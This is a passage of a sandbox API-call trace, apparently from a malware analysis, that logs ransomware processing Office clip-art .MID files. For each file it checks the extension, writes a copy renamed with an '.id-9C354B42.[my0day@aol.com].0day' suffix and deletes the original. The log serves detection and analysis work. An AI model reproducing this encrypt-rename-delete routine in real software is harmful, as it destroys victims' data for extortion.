1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.490] lstrlenW (lpString=".zip") returned 4 [0270.490] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.490] lstrlenW (lpString=".rar") returned 4 [0270.490] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.491] lstrlenW (lpString=".bz2") returned 4 [0270.491] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.491] lstrlenW (lpString=".7z") returned 3 [0270.491] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.491] lstrlenW (lpString=".dbf") returned 4 [0270.491] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.491] lstrlenW (lpString=".1cd") returned 4 [0270.491] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.491] lstrlenW (lpString=".jpg") returned 4 [0270.491] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.491] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.491] lstrlenW (lpString="JAVA_01.MID") returned 11 [0270.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.491] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=9797) returned 1 [0270.491] CloseHandle (hObject=0x38c) returned 1 [0270.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 0x20 [0270.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.492] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.492] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.492] GetLastError () returned 0x0 [0270.492] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x2645, lpOverlapped=0x0) returned 1 [0270.583] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x2650, lpOverlapped=0x0) returned 1 [0270.585] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.585] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0270.585] SetEndOfFile (hFile=0x2c4) returned 1 [0270.585] CloseHandle (hObject=0x2c4) returned 1 [0270.585] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.585] SetEndOfFile (hFile=0x38c) returned 1 [0270.589] CloseHandle (hObject=0x38c) returned 1 [0270.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.664] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 1 [0270.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.664] lstrlenW (lpString=".doc") returned 4 [0270.664] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.664] lstrlenW (lpString=".docx") returned 5 [0270.665] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.665] lstrlenW (lpString=".pdf") returned 4 [0270.665] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.665] lstrlenW (lpString=".xls") returned 4 [0270.665] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.665] lstrlenW (lpString=".xlsx") returned 5 [0270.665] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.665] lstrlenW (lpString=".ppt") returned 4 [0270.665] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.665] lstrlenW (lpString=".zip") returned 4 [0270.665] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.665] lstrlenW (lpString=".rar") returned 4 [0270.665] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.665] lstrlenW (lpString=".bz2") returned 4 [0270.665] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.665] lstrlenW (lpString=".7z") returned 3 [0270.665] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.665] lstrlenW (lpString=".dbf") returned 4 [0270.665] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.665] lstrlenW (lpString=".1cd") returned 4 [0270.665] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.665] lstrlenW (lpString=".jpg") returned 4 [0270.665] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.665] lstrlenW (lpString=".doc") returned 4 [0270.665] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.665] lstrlenW (lpString=".docx") returned 5 [0270.665] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.665] lstrlenW (lpString=".pdf") returned 4 [0270.666] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.666] lstrlenW (lpString=".xls") returned 4 [0270.666] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.666] lstrlenW (lpString=".xlsx") returned 5 [0270.666] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.666] lstrlenW (lpString=".ppt") returned 4 [0270.666] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.666] lstrlenW (lpString=".zip") returned 4 [0270.666] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.666] lstrlenW (lpString=".rar") returned 4 [0270.666] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.666] lstrlenW (lpString=".bz2") returned 4 [0270.666] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.666] lstrlenW (lpString=".7z") returned 3 [0270.666] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.666] lstrlenW (lpString=".dbf") returned 4 [0270.666] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.666] lstrlenW (lpString=".1cd") returned 4 [0270.666] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0270.666] lstrlenW (lpString=".jpg") returned 4 [0270.666] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.666] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.666] lstrlenW (lpString="MUSIC_01.MID") returned 12 [0270.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.688] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6880) returned 1 [0270.688] CloseHandle (hObject=0x380) returned 1 [0270.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 0x20 [0270.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0270.707] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.707] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.708] GetLastError () returned 0x0 [0270.708] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1ae0, lpOverlapped=0x0) returned 1 [0270.711] WriteFile (in: hFile=0x380, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1af0, lpOverlapped=0x0) returned 1 [0270.712] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.712] WriteFile (in: hFile=0x380, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.712] SetEndOfFile (hFile=0x380) returned 1 [0270.715] CloseHandle (hObject=0x380) returned 1 [0270.715] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.715] SetEndOfFile (hFile=0x354) returned 1 [0270.717] CloseHandle (hObject=0x354) returned 1 [0270.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.720] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 1 [0270.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.720] lstrlenW (lpString=".doc") returned 4 [0270.720] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.720] lstrlenW (lpString=".docx") returned 5 [0270.720] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.720] lstrlenW (lpString=".pdf") returned 4 [0270.720] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.720] lstrlenW (lpString=".xls") returned 4 [0270.720] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.720] lstrlenW (lpString=".xlsx") returned 5 [0270.720] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.720] lstrlenW (lpString=".ppt") returned 4 [0270.720] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString=".zip") returned 4 [0270.721] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.721] lstrlenW (lpString=".rar") returned 4 [0270.721] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.721] lstrlenW (lpString=".bz2") returned 4 [0270.721] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.721] lstrlenW (lpString=".7z") returned 3 [0270.721] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString=".dbf") returned 4 [0270.721] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString=".1cd") returned 4 [0270.721] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString=".jpg") returned 4 [0270.721] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString=".doc") returned 4 [0270.721] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.721] lstrlenW (lpString=".docx") returned 5 [0270.721] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.721] lstrlenW (lpString=".pdf") returned 4 [0270.721] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.721] lstrlenW (lpString=".xls") returned 4 [0270.721] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.721] lstrlenW (lpString=".xlsx") returned 5 [0270.721] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.721] lstrlenW (lpString=".ppt") returned 4 [0270.721] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.721] lstrlenW (lpString=".zip") returned 4 [0270.722] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.722] lstrlenW (lpString=".rar") returned 4 [0270.722] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.722] lstrlenW (lpString=".bz2") returned 4 [0270.722] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.722] lstrlenW (lpString=".7z") returned 3 [0270.722] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.722] lstrlenW (lpString=".dbf") returned 4 [0270.722] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.722] lstrlenW (lpString=".1cd") returned 4 [0270.722] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0270.722] lstrlenW (lpString=".jpg") returned 4 [0270.722] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.722] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.722] lstrlenW (lpString="OCEAN_01.MID") returned 12 [0270.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0270.723] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=5440) returned 1 [0270.723] CloseHandle (hObject=0x354) returned 1 [0270.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid")) returned 0x20 [0270.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0270.724] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.724] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.724] GetLastError () returned 0x0 [0270.724] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1540, lpOverlapped=0x0) returned 1 [0270.727] WriteFile (in: hFile=0x380, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1550, lpOverlapped=0x0) returned 1 [0270.728] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.728] WriteFile (in: hFile=0x380, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.728] SetEndOfFile (hFile=0x380) returned 1 [0270.728] CloseHandle (hObject=0x380) returned 1 [0270.728] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.728] SetEndOfFile (hFile=0x354) returned 1 [0270.730] CloseHandle (hObject=0x354) returned 1 [0270.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.731] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid")) returned 1 [0270.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.731] lstrlenW (lpString=".doc") returned 4 [0270.731] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.731] lstrlenW (lpString=".docx") returned 5 [0270.731] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.731] lstrlenW (lpString=".pdf") returned 4 [0270.731] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.731] lstrlenW (lpString=".xls") returned 4 [0270.731] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.731] lstrlenW (lpString=".xlsx") returned 5 [0270.731] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.731] lstrlenW (lpString=".ppt") returned 4 [0270.731] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.731] lstrlenW (lpString=".zip") returned 4 [0270.731] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.732] lstrlenW (lpString=".rar") returned 4 [0270.732] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.732] lstrlenW (lpString=".bz2") returned 4 [0270.732] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.732] lstrlenW (lpString=".7z") returned 3 [0270.732] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.732] lstrlenW (lpString=".dbf") returned 4 [0270.732] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.732] lstrlenW (lpString=".1cd") returned 4 [0270.732] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.732] lstrlenW (lpString=".jpg") returned 4 [0270.732] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.732] lstrlenW (lpString=".doc") returned 4 [0270.732] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.732] lstrlenW (lpString=".docx") returned 5 [0270.732] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.732] lstrlenW (lpString=".pdf") returned 4 [0270.732] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.732] lstrlenW (lpString=".xls") returned 4 [0270.732] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.732] lstrlenW (lpString=".xlsx") returned 5 [0270.732] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.733] lstrlenW (lpString=".ppt") returned 4 [0270.733] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.733] lstrlenW (lpString=".zip") returned 4 [0270.733] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.733] lstrlenW (lpString=".rar") returned 4 [0270.733] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.733] lstrlenW (lpString=".bz2") returned 4 [0270.733] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.733] lstrlenW (lpString=".7z") returned 3 [0270.733] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.733] lstrlenW (lpString=".dbf") returned 4 [0270.733] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.733] lstrlenW 